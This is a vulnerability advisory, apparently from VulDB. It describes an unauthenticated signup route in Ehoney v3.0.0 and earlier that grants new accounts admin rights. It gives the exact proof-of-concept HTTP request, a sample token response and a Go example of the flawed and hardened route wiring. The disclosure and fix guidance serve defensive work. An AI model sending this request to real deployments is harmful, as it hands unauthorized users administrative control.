# Ehoney <= v3.0.0 unpublished signup API via /api/public/signup

| Field | Value |
|---|---|
| Title | Ehoney <= v3.0.0 unpublished signup api via /api/public/signup |
| User | Anonymous User |
| Submitted | 2022-10-28 03:54 AM (3 years ago) |
| Moderation | 2022-10-28 07:42 AM (4 hours later) |
| Status | Accepted |
| VulDB Entry | 212417 [seccome Ehoney /api/public/signup privilege escalation] |
| Points | 17 |

## Description

In Ehoney <= v3.0.0 there is an unpublished registration route. Any user can register an account through this API and log in. Since there is no permission division, this user has the same management permissions as admin.

## Request

```http
POST /api/public/signup HTTP/1.1
Content-Length: 40
Content-Type: application/json
Host: x.x.x.x:8080

{
  "username": "a",
  "password": "a"
}
```

## Response

```json
{
  "code": 200,
  "msg": "ok",
  "data": {
    "name": "a",
    "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImEiLCJwYXNzd29yZCI6IiQyYSQxNCRINmVmQ0xLbFhRRnl3QXF6V0NGalB1bGhPLlU3MTlYRnhLZ1ZRN01OMTlUamhqZWo5bWcwVyIsImV4cCI6MTY2Njc3MjU4NiwiaXNzIjoiZ2luLWJsb2cifQ.GVpPi4PxprCAIiAMI7R_fko2g_9C-F9kVTFb_EbKWqo"
  }
}
```

## Affected code

https://github.com/seccome/Ehoney/blob/aba3197bd2fe9f16e9cf4e20c1a7df4a1608c5a7/controllers/user_handler/uesr.go#L51
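As an added example (not Ehoney's code and not part of this submission), the two fixes the report implies, side by side with the reported shape: the signup handler registered behind an admin-only check instead of as an open public route, and newly created accounts given a non-admin role so registration can no longer yield management rights. `userStore`, `requireAdmin`, `NewRouter` and the admin bearer token are assumptions for the demo, standing in for whatever session or JWT validation the real application uses.

```go
package main

import (
	"encoding/json"
	"net/http"
	"sync"
)

// Constructed demo, not Ehoney's code: accounts carry a role and signup never hands out "admin".
type userStore struct {
	mu    sync.Mutex
	roles map[string]string // username -> role
}

// requireAdmin stands in for real session/JWT validation: only the (hypothetical) admin bearer token reaches next.
func requireAdmin(adminToken string, next http.HandlerFunc) http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) {
		if r.Header.Get("Authorization") != "Bearer "+adminToken {
			http.Error(w, `{"code":403,"msg":"forbidden"}`, http.StatusForbidden)
			return
		}
		next(w, r)
	}
}

func (s *userStore) signup(w http.ResponseWriter, r *http.Request) {
	var req struct{ Username, Password string }
	if r.Method != http.MethodPost || json.NewDecoder(r.Body).Decode(&req) != nil || req.Username == "" || req.Password == "" {
		http.Error(w, `{"code":400,"msg":"bad request"}`, http.StatusBadRequest)
		return
	}
	s.mu.Lock()
	s.roles[req.Username] = "user" // least privilege: never "admin"; password hashing omitted in the demo
	s.mu.Unlock()
	w.Header().Set("Content-Type", "application/json")
	json.NewEncoder(w).Encode(map[string]interface{}{"code": 200, "msg": "ok", "data": map[string]string{"name": req.Username}})
}

// NewRouter wires /api/public/signup: open=true reproduces the reported shape (no gate), open=false is the hardened wiring.
func NewRouter(adminToken string, open bool) (*http.ServeMux, *userStore) {
	store := &userStore{roles: map[string]string{}}
	h := http.HandlerFunc(store.signup)
	if !open {
		h = requireAdmin(adminToken, store.signup)
	}
	mux := http.NewServeMux()
	mux.Handle("/api/public/signup", h)
	return mux, store
}
```

With the hardened wiring an anonymous POST to the route gets 403 and creates nothing, while an admin-authenticated POST creates an account that holds the `user` role only.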